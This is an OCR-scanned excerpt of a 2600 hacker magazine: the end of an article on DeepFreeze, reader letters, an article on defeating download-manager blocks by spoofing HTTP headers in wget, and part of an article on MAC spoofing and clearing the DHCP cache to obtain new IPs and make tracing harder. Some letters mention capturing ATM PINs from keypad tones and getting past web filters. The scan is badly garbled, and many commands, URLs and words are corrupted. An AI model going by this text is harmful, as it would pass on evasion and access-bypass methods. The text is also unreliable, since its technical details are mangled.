or refreshing the SID, usually requiring a for- 
mat to fix the problem, it’s important to pull it 
oft before refreshing the SID, and then put it 
back on. Speaking of imaging, one weird quirk 
with Symantec Ghost and DeepFreeze is that 
occasionally, w hen performing a hard resei on a 
computer or rebooting after the computer has 
reached the it is now sale to shut down your 
computer" screen, it will prompt you with a 
screen saying "Operating System not found." 
It's a minor annoyance, as a reboot fixes the 
problem, and it's rather rare. 

1 actually keep a copy of DeepFreeze around 
for my home computer. Why'.’ ft makes a great 
sandbox to play around in. 1 can do anything 1 
want and screw up my system as much as possi- 
ble, and the fix is only a reboot away. Anyone 
wanting to foot around on a computer with 
DeepFreeze on it can do so without worrying 
about messing up the software. You can even 
power off or reset the computer without the 
proper shutdown procedure, DeepFreeze doesn’t 
care if Windows shut down improperly - it 
restores it to a nice state anyway. 

Hopefully you've gained a little hit better un- 
derstanding of this program. It’s becoming more 
widely used in the world, and understanding its 
strengths and weaknesses helps the curious bcl- 
Lcr use or appreciate the program. It's also a 
great example of how a strong piece of software 
can be bypassed due to the ignorance of an 
administrator. 
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continued from page 39 

Dear 2600: 

! have found on several ATM's that all ten mini tier 
keys have distinct tones and can easily be told apart. 
This is the dumbest thing an ATM manufacturer can 
do T as anyone with a good grasp of tones can easily 
get someone elxe's PIN without watching or very eas- 
ily record this, take it home, and analyze it with 
standard audio software. 

Mark 

the very least, it can he used to impress fund 
frighten ) friends as they shield the keyboard from 
your prying eyes. 

Dear 2600: 

You printed a letter in 19:2 regarding google re- 
moving a site from their directory due to a DMCA vi- 
olation which was tiled on behalf of the 
Scientologists. I tend to gel a chuckle out of the Sci- 
entologists so 1 figured I'd see what the violation was. 
At first i found mostly boiler plate stuff (pictures and 
documents) until I scrolled down to the end. Under 
"Federally Registered Trademarks'' wc find an L. Ron 
Huhhard signature which is registered w ith the United 
Slates Patent and Trademark Of! ice under registration 
number 1,821,751. 

Now let me get this straight. This idiot actually 
went and trademarked his signature? Wow, 1 wonder 
what happens when he signs for a Fed-Ex package. 

The MbbliT 

(t probably causes quite a commotion. 

Dear 2600: 

Late one Tuesday night 1 came to a realization. As 
I finished a box of Cheezdts, 1 realized 1 hat if one 
halved the box at an angle, it makes two perfect hold- 
ers for one's issues of 26001 Sadly, I only had enough 
issues to fill one, but l trust l r Il fill the other. 

Spooky Chris 

Perhaps we re witnessing the birth of a new 
p breaker box - The Cheez Box (not to he confused 
with the original Cheese Box of days past). 

Dear 2600: 

While I was at FOXs web site ftying to find out 
when I might he able to buy episodes of Family Guy, I 
ran across this gem; 

,r & Can I get tapes of FOX Network Primetime 
Shows sent to me? 

"ANSWER: The FOX Network does not provide 
nor sell videos of tiny of shows hie f. specials or 
movies (hat air on the Network. 

"Our recommendation is to ask co-workers, 
friends, family and neighbors for anyone who may 
have taped off-the-air the show you are looking for . ” 

Now correct me if I’m wrong but wouldn't that be 
stealing or some son of copyright infringement? Sar- 
casm fully intended. It sickens me to realize that this 
was nay first thought when I read this. Look at what 
corporate America is doing to people. Down with 
corporate rule! 

You guys do a fantastic job. Keep up the great 
work. 

jessc 

Let 4 just hope this common sense approach 
becomes more of a standard. 


Dear 2600: 

I think Jack Valenti is a great man doing great 
things. The hacker community will soon be behind 
him. 

Christopher 

It s the logical place to he if we're about to 
overtake him. 

Dear 2600: 

[ just received a shareholder report from one of 
the funds in which my 401k is invested. I usually 
throw the report out or file it away without reading it. 
After reading my earnings statement and finding that 
the value of my 401k had dropped by 20 percent, I 
thought maybe the report could give me a due as to 
why this had happened. It cited various reasons al- 
ready covered by (he media, but this was my favorite 
and i thought you might like to read this: 

"And Now for the Bod Ne vv.s.. . 

The popular passion to punish the corporate 
culprits is likely to achieve wily modest satisfaction. 
Fraud was rare and is hard to prove in court, la-gal 
hut bad behavior carries tittle cost to the perpetrator. 
The U S, does not have the strong 'culture of shame ' 
which effectively regulates executive behavior in 
Japan. We have no compulsion for ritual apology i to 
say nothing of ritual suicide) in this country. Many of 
the executives who lost a fortune for the shareholders 
who trusted them simply will sail off into retirement 
on their yachts . " 

This report came from the Clipper Fund. It has a 
web site at www.dipperfund.com. 

This report may not have much of an impact hut 
hopefully it may open the eyes and ears of those who 
refuse to listen to the same information just because it 
came from a hacker magazine. Thanks 2600. 

justiiiburh 

Dear 2600: 

l just literally stumbled on this while researching 
something. Go to www.singtr.com, click on (he "in- 
tranet' 1 button at the bottom of the screen. Enter 
"guest 11 as both username and password, Voita! You Ve- 
in (he Singer Company's intranet. 

jmk 

Or so they say. There doesn't seem to be a whole 
lot you can do as ‘ guest. " 

Dear 2600: 

I just got done reading 19:3. In the letters section 
echo! on talks about White House numbers like 3 U 
436-9431. I called it out of curiosity. The guy ui tin- 
phone answered "Situation Room," I asked what they 
do (here and he struck up a conversation about siinu 
in the Rocky Mountains. Then lie slipped and said lie 
was in the White House, f called again later tonighi 
and a guy answered and asked for my name anil 
phone number Of course l gave him false info (not 
like he couldn't have gotten it anyway), i as keel (In 
guy again what they do there and he pin me on hold ,i 
sec and said they were a pri vate federal government 
agency and (hey take care of security matters. 1 spoL 
to a close friend who is ex -Air Force Intelligence. He 
told me that is where the top military officials hold 
conferences on top military matters and that I should 
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noi have that telephone number. Thai is die same 
1 1 >om where they held the talks about the Cuban mis- 
mIc crisis. Well, hope this enlightens, 

Radarjam 

We admittedly don 't know a whole lot about what 
goes on in that place. But common sense would dic- 
tate that repeatedly calling the equivalent of an inter- 
na! crisis center in an increasingly paranoid and 
powerful government may result in some kind of back- 
lash, Of course, the ease with which such information 
< an he found makes one wonder how serious they are 
about keeping it secret in the first place . 

Dear 2600: 

I just picked up 19:3 and read your response to 
echelon's Idler noting a phone number for a "situation 
room.' When I Lried your RDF URL 1 got a 404, so 1 
[bought I'd lei you know where I eventually found the 
i nfo: fmp://www,fema,gov/emanagers/ecd Joc.shtm . 
FFMA doesn't advertise this kinda stuff, but a search 
lor "contact" produced it easily. 

sunzi 

Dear 2600: 

This was published in The Economist of October 
’ft Countries were ranked according to press free 
dim i , The top five were Finland. Iceland, the Nether- 
, i n<ls, Norway, and Canada and the bottom five (135 
in I 39) were Bhutan, Turkmenistan. Myanmar, Chma, 
Hid North Korea. Press freedom is not necessarily the 
preserve of rich developed countries, according to the 
■indy conducted hy Reporters Without Borders, 
l lumgh Lhe besi and worst included few surprises, the 
' uted Slates, in 1 7th place, came in below Costa 
l-'iL/a, I Laly, the lowest ranked G7 country at 40di. sits 
ily just above Mali; and Russia languishes at 12 1st 
! ' hind both Sudan and Haiti. 

You knew this already, didn’t you? 

Cambalache2f) 

Actually we didn't hut it seems about right. Isn’t it 
Id though how all of the top Jive countries are high 
t ■ in the North while the bottom five are all in Asia ? 

Dear 2600: 

In 19:2 Bildo suggested using www. proxy site,- 
■m to bypass Wcbsense, a proxy commonly used at 
In ols for tillering web Lralhc. Since then, prox 
in's been blocked too* To view a page blocked by 
Websense. simply search for the page on Google and 

i their cached page Just another suggestion for all 
Hi v,. In ml -goers. 

kldfin 


I intr 2600 : 

I noticed that there was an IP address if you 
tpped i he tabic of contents over in 19:3 underneath 
Hardware Broadband Client Monitoring - An 
i v lew " 1 typed it in and my browser gave me the 
m» t orps website. I thought that this was cool be- 
ihat site was right underneath the word 
Mum tori ng. 

derrick 


Tale From The Past 

Dear 2600: 

Back in 1977 I bought rny first computer: an Ohio 
Scientific C I P. This apparatus had a 6502 chip, 1 2K 
BASIC in ROM, a full keyboard and video output, 
and 4K of SRAM, expandable to 8K on board and 
32K with a daughterboard. Data storage w r as cassette 
tape. The C I P cost me S40D. an a fiord able sum com- 
pared to the $800 for a TRS-80 and the $1,200 for an 
Apple, and it was just about as powerful as the Apple. 

It didn't take me long (o add and populate the 
daughterboard, ft took me a link longer to double the 
processor clock speed, which I did by the simple ex- 
pedient of cutting the appropriate trace to the fre- 
quency divider chip and resoldering the cloc k signal 
to the next chip output. By the time I was through 
with that machine, it was a kludge of additions and 
changes, including an S- 100 bus board (which I sol- 
dered myself) and a home-built power supply to re- 
place the original that died, 

1 was what was ihen referred to as a hacker. We 
hackers were hardware freaks who made changes to 
our equipment by ourselves w ith add-ons that wc gen- 
erally built ourselves, often with scavenged parts. 
Most of the things we made were kludges, dial is. they 
looked like a rat's nest of bits and pieces and wire. 
They weren't pretty, but they worked. Wire wrapping 
was one popular kludge methodology and plugboards 
were another, but [hose specially designed kludge 
boards that eventually came out were just too sophis- 
ticated for us. 

Those old computers brought new meaning to the 
expression "open architecture 11 and gave us hackers 
lots of opportunity to experiment and improve. But 
once the Commodore 64 came out, I sw itched my en 
ergies to software and machine language program- 
ming. ll was just as well, because the term "hacker" 
started to take on a whole new, and much more pejo- 
rative. meaning. 

I buy 2600 every once in a w hile, in part to sup- 
port what 1 feel is a very worthy and admirable cause, 
and in part Eo try and stay abreast of some of the many 
security and privacy threats that are being visited 
upon us by governments. You are a voice in the 
wilderness. Thank you 

John EG 

Retail World 

Dear 2600: 

I love your magazine, have been reading it for 
several years now. Like one of the letter- writers from 
the past issue* I'm afraid to subscribe, so 3 buy each is- 
sue (with cash) at B&N, I'm always amused by the re- 
actions the sales clerks give when they look at what 
I'm buying. I’ve had one lady sarcastically say "Al- 
ways a lovely publication? More recently, the guy 
looked back and forth several times between me and 
the magazine. The expression on his face clearly said 
Oh. so this guy is a real live hacker! 11 Ha, Thank you 
for providing me with this personal joy every three 
months, 

Dan 
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Dear 2600 : 

1 would li ke lo say something about fuzzhack's 
tetter from 19.2, You're just a little too paranoid, l had 
the same thing happen to me at my local Bonders 
store. But using a little observation I determined that 
the cashier that rang me up must have been new since 
he was asking [lie other cashier for help and that both 
cashiers were asking everyone for their email address. 

Zac T* 

Dear 2600 : 

In response to Signal's letter about the poor 
placement of 2600 I would like to add a quick note, 1 
reside in Princeton, New Jersey and in the Humes & 
Noble locations there all of the 2600 magazines arc 
easy to spot and in front of all other magazines. Most 
probably due to the fact die dimensions of 2600 tire 
smaller than others, but I have never seen anyone 
shun people picking it up or checking out with it, 

XiChimos 

Dear 2600 : 

In response to Signal's letter about the placement 
of magazines in stores. I would like to shed some light 
on the subject. It was described as though the stores 
are trying to "hide" your magazine on the back shelf, 
along with Adbumrs. Not so. As the periodicals clerk 
for a major bookseller, I can assure you that the mag- 
azines who pay to have face outs (front slots} are the 
ones who are m the front. Ibis is why the magazines 
were moved to their proper area so that they would- 
n't face a tine if discovered. Jn my store, both 2600 
and Adbusrers are in the front. I don't know how fa- 
miliar you are with magazine vendors and news- 
stands. but we arc very open minded individuals, as 
we set up our stand with merchandising systems that 
are made to sell, not hide, magazines By the way. 
26(10 hies off our shelves within days of receiving 
them, We have to up the draws frequently. 

acj626 

Dear 2600 : 

I know I may be a little late on this but after see- 
ing one letter from another reader in 19:2. 1 thought i 
would email you. I tty to gel a copy of 2600 whenever 
[ can at the B&N near me and, every time I have gone 
there, the issues of 2600 have always been displayed 
right at the front of the shelf in from of any magazines 
that may hide it. and at easy- to find eye level where 
anyone can readily find it. No one has ever looked at 
me fishy for buying it nor asked me any questions 
about it. 

So either the managers at this particular B<&N 
don’t care, believe in being fair, or just don't know 
what 2600 is about, K Fiber way. it s nice to know that 
not all retailers arc the same. 

pine hep link 

We believe \onr experience is more the norm than 
the exception , Av with most everything, negative 
experiences can he more memorable. 


Parallels 

Dear 2600 : 

I’m about to draw a comparison that will surely 
raise some hackles amongst the hacker community. 
To set the stage of how this crossed m> mind. I was 
driving home from work and heard something on the 
radio where a local business w as having a to-do of 
some kind to honor the fallen firefighters from 9/11. 
(They made no mention of the police that died that 
day, } Next to me in the passenger seal was my crisp 
new copy of 2600 dial I haven't even finished reading 
yet and it dawned on me: hackers and cops arc a lot 
alike in some regards. You sec. I r m a cop. And an avid 
reader of 2600. And a want-lobe hacker. I just don l 
have the time right now to devote to Seaming how to 
program and I refuse to be a grown up script kiddie. 
But l digress. How arc we alike, you ask? Hackers, 
the real ones, work hard at becoming good at some- 
thing and most desire only recognition for achieve- 
ments and take pleasure in discovering security holes 
and learning how to fix them (only to name a couple 
things}. The hacker community constantly has to deal 
with a host of morons who pretend and claim to be 
hackers but instead give everyone else a bad name. 
Ami us cops? We. too, bust our asses to do our jobs, 
get little recognition for it, and the ones who stick 
their head up their own asses and do something dumb 
attract the whole country's attention and we, too. be- 
come public enemy number one, ITie big difference? 
People smile and play nice when I'm around... a 
hacker walks through his high school wearing a Free 
Kevin shirt and gets expelled. Oh yeah, why would a 
cop want to learn how to hack? Someday I hope to 
work for the Feds hunting down those who would vic- 
timize children through kiddie porn. 1 consider that, 
besides drugs, one of the most important things the 
government can focus on. -So hack on! And keep 
putting out this kick ass mag knowing that there's at 
least one of tne out there on your side, 

Sparkster 

A New Project 

Dear 2600 : 

Do you expect a DVD version of Freedom 
Downtime to he av ailable for the holiday season? 

Poetics 

Yes. wt do. hm not for the holiday season that just 
passed. In fact we hope to have the DVD finished well 
before the next one. This project is dependent entirely 
an how much time we can allocate to if as well os him 
much money we can raise through video sales. We ex 
peel to add quite a few features and additional 
footage , as well as other things. We're still open to 
suggestion on this. 

Dear 2600 : 

I'll he more than happy to translate Freedom 
Downtime into Italian when you gel the DVD out 

ElfQrin 

As this is our latest project, we're iti the process of 
getting a hunch of translations done as soon as possi- 
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If you have suggestions or want to help out email 
ns at do wfitime fe- 2600. i r mi. 

Critique 

Dear 2600 : 

I must voice my objection to the "angle'' 2600 
H unk on its coverage of Sherman Austin's indictment. I 
have always placed strong faith in 2600 and its posi- 
tion of supporting free speech. However the way in 
a hieh your online article was worded reminded me of 
tlu tactics national news coverage often use to depict 
I lackers, "It is not clear why Austin is being targeted; 
more detailed and potentially destructive bomb-mak- 
mg information is readily available ai public libraries 
"i on Amazon.com." It, to me at least, is very obvious 
hat 1 he reason why Sherman Austin is being targeted 
because l he man has upside down and burning 
Xmerican Hags on his web site (www. raise- 
ihelist.com). Make an outcry lor the man's right of 
n e speech, cite the government's Gestapo- like tae- 
i . hut for pete's sake don't martyr a man because he 
li tes some of your ideas at the expense ol journal is- 
iu integrity, 1 admit some of Austin's ideas are appeal- 
m but right-wing- ism (making bombs, stickers 
illing us lo arms, blatant disregard for the way others 
lit uk) is not the 2600 that I have come to know. If it 
then I for one fed that 2600 and I must go our 

■ pur ate ways. 

AGEJ8 

You may have already begun that journey. We 

■ jin / hy the story { which only appeared an our weh- 

oml not in these pages] as on example of how 
meant with unpopular views con he i ndi scrim i- 
i nets targeted for prosecution while of her more 
tiuii n stream outlets of the same views remain ttn- 
'« fed. How you see us making a martyr of him is to- 
ri' hexond us. And if van truly believe that only the 
•ht wing believes in the things you cite, we suggest 
.-ding some history or simply getting out a hit more. 

I *ar 2600 : 

Perception is reality. The perception tin the real 
'ild) is i hat all hackers arc had , So it's the reality, 
i d i hat s Llia l . I know you guys and ihe readers of 
lee magazine think and know otherwise hut what the 
il world perceives is reality. Gel over it! There w ill 
: r he good hackers, 

C an you imagine a World War ll veteran believing 
1 1 1 there were good Nazis? C an you imagine an early 
< m settler believing that there were good Endi- 
< Fin you imagine a southern redneck believing 
llllil there are good N....? No way. No one but the 
hIlts of this magazine (who are so paranoid that 92 
cm of them buy it off the rack ) will ever believe 
ih.it there are good hackers. No amount of money or 
•motion or ranting will change that 
t hi lop of that you title your magazine "26002' Do 
ii really know what 2600 is? Lei me lell you what il 
in the real world. It's a four digit number that stands 
■ live letter word: fraud. Nobody who built a blue 
■. w glee ftv Ily calls t hemse I ves a " pi tone phreak " i s 


interested in privacy or security or any of the artful 
dodges used to describe good hackers. They were anil 
are interested in screwing Ma Bell. In a word* 
stealing. It r s ludicrous, 

Then inside the magazine there are lovely articles 
about how so cheat Blockbuster, say naughty words 
on the scoreboard during a football game fnoi really 
but if you couldn't read that between the tines get an 
imagination), a lovely personal ad for a guy who 
wants to break into homes through garage doors when 
he gets out of prison, another from a prisoner who is a 
virus writer wanting help to become an expert in his 
chosen hackers kills, and a third that can only be de- 
scribed as pornographic. Do you guys have editors? 
Do you have editorial standards? I know you live on 
Long Island, but please! 

If your magazine is for good hackers, presumably 
those with nothing to fear from the law, then why are 
the vast majority of articles and letters 
uulhored/signed hy persons using pseudonyms? May I 
answer? Your magazine, as currently published, can 
easily be slmwn to be a thinly disguised manual for 
criminals. You have every righi to publish ii and to 
rant and rave that you're really the good guys. In ain- 
tain that an objective (and probably even computer ig- 
norant) reviewer would conclude ihai you're 
delusional at best As a computet knowledgeable per- 
son who has been on this planet for just less than 0x40 
years 1 applaud your defense of free speech, fair use, 
and f'lhcr freedoms. I abhor your wink and nod 
approach to criminal activity. 

Well, it's not fair to criticize without offering an 
alternative so here it is. Instead of hackers (who are 
bad and acknowledged as bad) and 2600. change the 
title of your group and the name of your magazine to 
Sweepers. 1 ' Like ali else ihese days, it's an acronym. 
System Weakness Exploration Explanation (not Ex- 
ploitation!) Publication Ethical Remediation 
Standards, 

Thai s what "good" hackers do. They explore sys- 
tems with the principal intent lo leant. When (if) they 
find a weakness they explain it and, in a responsible 
way, publicize it and hopefully publicize 
workarounds (remediation). AH of ihis is done in an 
ethical way following published standards with no in- 
tent for monetary gain (intellectual gain is line, indeed 
the main motivation). Standards for publication hy a 
Sweeper should include letting the author know first. 
Wider publication should be done only if the author 
Jails to respond and only if a suitable workaround is 
published at the same time. Absent a suitable 
workaround and author response, the publication 
should be limited to 'there's a problem with product x 
and the author won't deal with it." not what the prob- 
lem is or how lo trash Lhe system and show the author 
just how smart and powerful we are! Letting the 
world know that independent, better-t ha n -average 
beta testers (our word is sweepers) have discovered a 
significant problem w ill, in most cases, sufficiently af- 
fect sales and the author will gel the message very 
quickly. 
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These standards can he easily adapted to editorial 
standards as well, although the magazine might get 
thinner for a while. 

Dave D. 

After taking a vote, we've decided to take offense 
hi being compared W Nads. We’re going to let the 
Long ! stand remark slide. That aside* you raise some 
interesting points- But you also claim to know, among 
other things, how the whole world perceives a partic- 
ular group of people, what's going through our heads, 
as well as the intentions of every one who writes in to 

While some of the worst element that you describe 
does in fact exist, to say that it is the norm and that we 
encourage this kind of thing is unfair and highly inac- 
curate. You clearly don’t know the History and you 
can run know what people get out of the articles they 
read and write in our pages. The only advice we can 
offer is that you stop assuming that every one thinks 
like you. Best of luck in the sweeper world. 

Significant Developments 

Dear 2600 : 

Well I don't know it you care but I am in the group 
2600 for seti Thorne and ironically, I just hit 2600 re- 
sults sent l Just wanted to let ya know, not that you 
probably care! 

RusH 

Of course vte care. Although we’re quite disap- 
pointed that this magic number didn / result in a dis- 
covery. This is one of the most worthwhile projects 
we re aware of and for those who want to get involved 
and learn a whole lot more about it , go to http iff se- 
tia thorn e. ssl. be rkelcy. edu . 

Dear 2600: 

According to can article at newscientist.com, in the 
year 26(X) an asteroid that orbits the sun along ihe 
same path as the Earth will in fact orbit the Earth for 
50 years as a second moon. Amazing.., even the 
heavens and ihc earth are controlled by 2600. 

fstratto 

Incidentally, we're planning on rusting our sub- 
scription price in half for the entire year of 2600 as a 
special promotion. Stay tufted for more details. 

Defining Hackers 

Dear 2600: 

] am no important sports star, l am not the lead ac- 
tor in the school play, nor the highly grungieal youth 
who pedals the hallways in search of some untimely 
demise I am me. I am here for who l am. not a fol- 
lower of a gsoup nor a piece of a puzzle. Lei me in- 
stead be considered the shepherd to a flock of sheep. 
But that flock weights so heavily on the judgmental 
aspects of society. You see. ihis flock and I are those 
that long for what is never achieved, strive for what is 
never gained, hope for the light at the end of the tun- 
nel ihai is too long to walk, too strenuous to master. 
We are those unlike others. We may no t tit society's 
mold of the conventional norm," we may not walk 
Hie guidelines to call us average. But then again, who 
would want to he average? A fact once stated* "One 


out of every 250,000 people has a brief moment of 
glory, one out of every 500 j>eopte will he remem- 
bered within 10 years of their glory, but only one man 
will ever he remembered as the man that dare break 
the boundaries and rules," This is whal we do. We are 
lhal one person, us as a flock, a whole. Groups slow ly 
fade. Fashions slowly die out. We are unlike any 
other Pul us in a host and we will scale the walls to 
free ourselves. We do not crumble, nor cry. nor sepa- 
rate. We ore brothers and we are sisters. Hath not the 
fury of ten thousand burning suns to meh us, nor ten 
thousand blows of the heaviest hammer to break us. 
We are Hackers and we are Phreakers. Fh34r us now, 
but do not expect the feeling to be mutual. 

fflx deacon 

It's moments like these when it becomes clear that 
we could start a cult and probably get away with all 
kinds of things. But seriously, let s not lose touch with 
our hitman origins. 

Reaching Out 

Dear 2600: 

Greetings. I've been reading your magazine for a 
few years now, glancing at the website on various oc- 
casions as curiosity demanded. I currently live in one 
of the larger cities in Alabama and through my day job 
became familiar with one of the men running lor Sen- 
ator here in the slate. He approached me seeking in- 
formation about maintaining an internet broadcasting 
system (In fact, a few meetings wem by without me 
being aware that he was in the running). This panic u- 
lai person seemed at leas L somewhat familiar with the 
computer world although his lack of experience and 
know ledge hud me worried for a little while in regards 
to the laws recently passed dial affect net broadcast 
ers, 1 brought this to his attention and even loaned him 
a few of my 2600 issues in hopes that he'd gel a belter 
idea of what he was in for. Days went by and he came 
hack to me with my books, full of questions which I 
did my best to answer and a lot more determined to do 
whal he could in order to affect changes within his 
scope in the Senate race. Sadly though, he didn't win. 
This however hasn't changed his views (which were 
recently broadened by 2600 I might add). I guess this 
goes to show that while corruption may in fact he a l 
over the U.S, and other parts of the world, there arc 
those people who do want to make a change and who 
do nvT/u a better life for not only themselves but their 
children and beyond. 

It may not seem tike there is much point to this let- 
ter but 1 1 lias been quite a change of pace compared to 
the normal routine I run into that all "hackers are evil 
and thieves, etc... blah hi ah blah. It has also shown me 
personally that there are people trying to get into posi- 
tions in order to affect changes that would nol only 
benefit certain communities, but attempt to unt" 
some of the wrong decisions made before them. 

Nygfafl 

We’re going to need a whole bunch of these peo- 
ple, We re grateful for your efforts in planting some 
seeds. 
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BEATING DOWNLOAD 
t MANAGER PROTECTION 


by Straightface 

si raightfacegangsta @excite*com 

While searching for interesting hies on Lhe 
net you may encounter a file that has been 
"Download Manager Blocked," meaning that 
you must use a browser to get the file. If you 
a l tempt to download the file with a download 
manager, you will receive a iovely text mes- 
ige in place of the file you desired informing 
\ou of your "mistake, " Some may feel de- 
feated, but with a little slight of hand you can 
use a download manager to retrieve the file. 

The initial question we have to ask our- 
Ives is "how in ihe world does the server 
know whether ihe program making the down- 
load request is a browser or not?!?" The an- 
wer can be found by analyzing the HTTP 
headers ihe browse: sends in its request for the 
file. The server attempts to protect itself from 
low n load managers by checking for particular 
HTTP headers. Usually it checks the "User 
\gent M header and can also check for a cookie 
'i referring page header. 

First we must fill our tool box with the 
proper tools. We will need a packet sniffer to 
learn how the browser is communicating with 
lie server. Sniffit is a nice one for Linux. If us- 
ing Windows, Win Dump works well. Be 
i ware (he WinPcap libraries are needed for 
"A in Dump to work properly and can be found 
hi the Win Dump web site. 1 also employ the 
Windows program Dice to read the raw files 
Win Dump creates, Wc are also going to need a 
nice customizable dow nload manager, f or this 
1 choose wget. it is available for both Linux 
md Windows, free, and has a very small 
footprint. 

Once we have all the lools ready we can 
begin to collect ihe proper HTTP headers, 
mart up the browser of your choice and bring 
n to the web page with the link of the file you 
' uni to download. Make sure you have your 
■ iokies enabled on the browser Now it is time 
lo stall up our packet sniffer Make sure you 
ire sniffing the right interface. In this example 
ihe interlace is pppO. Win Dump requires you 
to lirst run it with the -D option for a list of in- 


terfaces and then you must choose the proper 
one. See the documentation lor full details. 
Using sniffit: sniffit -t @ -F pppO 
Using wind amp: windump -w ouipui.cup i t 

Now we are all set to capture the he idei v 
Go back to your browser and click on the 
proper link for the file. Choose a place fm it to 
reside and start the download. Let ihe life 
download a few kilobytes, then stop it. Now 
lefs look at the packets we captured. Sniffit 
will leave behind some hies whih names liU 
11 65 .23 .29.34,3 3265 - 208 .4 8 ,67 . 24 . 80 " which 
you can view with your favorite text editor. 
When using WinDump, opening the output 
file with Dice will give you a list of all the 
packets you caught. The packets of interest arc 
usually the first few leaving your machine. 
You can tell it is leaving as the first IP address' 
pon number is pretty large, such as in the ex- 
ample file name above. Find the HTTP request 
the browser sent. U will look something like this: 
GET /myDLmanage rblockedfil e.avi H TTP/1 . 0 
Con nection: Keep -A / / ve 
User-Agent: Mozilla/4. 7H [enj (Linux 2.4.8 
i686) 

Host: nodlme.com 

Accept: image/ gif image/jpeg, imagefpjpeg, 
image/png, */* 

A crept- Encod ing : gzi p 
A ecept-Language : en 
Accept- Charset: iso-8859- L * uif-8 
Cookie: J908dkl=9S 

R efe rer: h Up YA v ww. n odltne. com/) ddeo5. h In 1 1 

Ah ha! There are some odd \ FFTP headers 
in the request. The two lines we ward to pay 
attention to are the "Referer" and "Cookie" 
lines. We also need to include the "User 
Agent" header in our download manager's re- 
quest. Now we know how to emulate the 
browser! 

Finally, lets set wget to retrieve the file. 
The wget command using the above captured 
packets will look like this: 
wget - u ser-age n t= r M ozi 1 1 a/4, 7 8 [en i (Linux 
2.4.8 1686)' \ 

”header= r Cookie: f908dkl=93 r \ 

—he ade r^ 1 Re ferer : 
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h t ip ;// w w w . n od 1 me . co 1 1 1 / v i deo5 , h i m 1 ' \ 
http: // w w w, do w j \ I oad me . co m 1 m y D L m an 
agerblockedfilc.avji 

The file should begin to download prop- 
erly. If it gives you the "No Download Man- 
agers" message you might have missed 
another abnormal HTTP header. You can sniff 
the browser's request for the file and then mill 
wget's request and see how they differ to find 
your missing header. Simply include the miss- 
ing header in your wget command with the — 
header option. For serious downloading, wget 


has options to download a list of files, hut I 
usually just set up a bunch of wget commands 
in a batch hie. 

Have fun with your knowledge of packet 
sniffing and HTTP headers! They are great 
tools for your own personal toolbox.... 

URLs Used 

Dice: h up :// w w w.n gt ho m as. co.uk/dicchtni 
Sn ifflt : h up :// rept i I e . rug ,ae , lie/— c oder/ sni ffi t/sn iffil hut i 1 
wget f Linux): hnp://w wgnu.org/so ftw are/wget/wget.htm) 
wget ( Win32): http://space.tin , i t/computer/hherol d/ 
WinDump : h tl p :// w i nd u m p. po! i to. it/ 



by diOnysus 

Did you ever wonder when you turn on your 
computer to surf the web how the heck your 
computer knows what IP to use? II you are read- 
ing this article, chances are you already know. 
For those who don't know-, I will give you a lit- 
tle background before revealing how this magic 
can he used for good,,, err.,, evil... well... you 
can choose exactly how you use your newfound 
knowledge. This magical union between your 
computer and your ISP s server is known as 
PI I CP i Dynamic Host Configuration Protocol). 
When you turn on your computer, or anytime 
you request it to. it sends a request via UDP on 
port 67 or 68 asking for information on how it 
should configure the network interface. Infor- 
mation like what DNS server to use, what IP 
and netmask to use. DHCP w as created by the 
Dynamic Host Configuration Working Group of 
the Internet Engineering Task Force (wow. that 
was a mouthful). In this article 1 will concen- 
trate more on how it works than where it came 
from. We will leave its origins for a more boring 
article another time. I will also explain how to 
bend it to your will,,.. 

Why Should I Care About DHCP? 

One of the first lessons every aspiring script 
kiddy learns is the importance of his IP. Your IP 
is what identifies you to the rest of the Internet. 
When you spew packets from your computer, 
this magic number is recorded all over the 
place, like footprints in the snow saving "1 was 
here." The only people who can quickly trace 
this number to your actual computer are your 
service providers. Coincidentally they are also 


the ones handing out the IPs (insert sarcasm 
here) So what if you could have 30 different 
IPs in an hour/ That would sure make tracing 
you a lot harder. Easy, right? Just request a new 
IP from the magical DHCP server and rejoice. I 
wish it were that simple. When you get an IP 
from the DHCP server it assigns you a lease. 
This lease is the amount of time that it will give 
you the same IP. Also, some ISPs, like my local 
ISP, require you to register your MAC address 
with them or their DHCP server will never give 
you an IP in the first place. The MAC address 
(Media Access Control) is the unique hardware 
address given to your network card by its manu- 
facturer. This gives them an extra level of "seeu 
rity.' 1 Security is in quotes because I will 
demonstrate how to fool the DHCP server into 
thinking you are someone else. Lastly, you have 
a cache on your end that also says what IP you 
had last time you hooked up with the DHCP 
server. If your lease is still good the server w ill 
try to give you the same address again. This is 
nice if you have a domain name registered lo u 
home account, but not so nice if you want to do 
some port scanning. You would never do 
anything like that, right? 

Get To The Good Stuff Already! 

So now we know a little about how DHCP 
w orks. Let's get into how h can be useful, t lib 
article assumes that you arc using a Linux box 
a s a fi re wa 1 1 / rt >u le r I i >r in te rna 1 W i n dow s boxes 
1 will also assume that you have installed the 
Cygwin package from Redllat on your Win- 
dows box. 11 you have not installed Cygwin you 
should really check it out. It gives you much 
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' nt\ like functionality on your Windows box. 
’»l the least of which is perl, which we will be 
mg later. Cygwin is free at http://sources.red- 
il,com/cygwin/. 

Hie Non- Authenticating DHCP Server 

This could also be called Lhe "easy to fool 
J J l ICP server/' simply because it will hand out 
>ii IP to any old MAC address. As mentioned, 
our MAC address is wTiaf the DHCP server 
uses to keep track of who's who. Unlike lhe au- 
thenticating DHCP server, we will not need to 
» Horm any real magic to get a new IP. For the 
si of the article I will assume that we lire using 
1 1 id I or our external interface on our Linux box. 

, let's do some initial checking. Fo find our 
M AC address w r e can simply do an 'ifeonfig na 
ihO'. Or. if we really warn to feel like Unix 
As we can use: i Icon fig -a ethO j head - 1 ( cut 

! I I -cl This command will become useful 

l iter when you write a script lo automate the 
new IP process, right? We also need to lake a 
look at our DHCP cache. Lets do an Is 
tc/dhcpc'. You will likely see the following 
i des: dhcpcd-ethO. cache, dhc pcdethO. info, and 
Ihepcd-ethO.info.old. We can safely remove 
these files with an 'nn flf /etc/dhcpc/dhcpc^ethO*' 
iveause we don't want the DHCP server to 
1 now that we ever had an IP. The next thing we 
need to do is "change 11 the MAC address that 
ill be sent to the server. First, make a note of 
mr MAC address. It will be something like 
fM);50:DA:OA:24:26. Let's change it to 
dO:50:DA:GA:24:27 and try to get a new IP, 
First we need to take down the interface with an 
ifeonfig ethO down' and then we can change Lhe 
f \C address with an 'ifeonfig ethO hw ether 
dd:50:DA:0A: 24:27', Now we bring the inter- 
I ice back up with 'ifeonfig ethO up' and Iasi but 
not least we request our new' IP with /shin/ifup 
■ihO' and voila! You have a new IP, If you got 
the same IP you had before, you probably forgot 
to delete lhe cache in /etc/dhepe. At this point it 
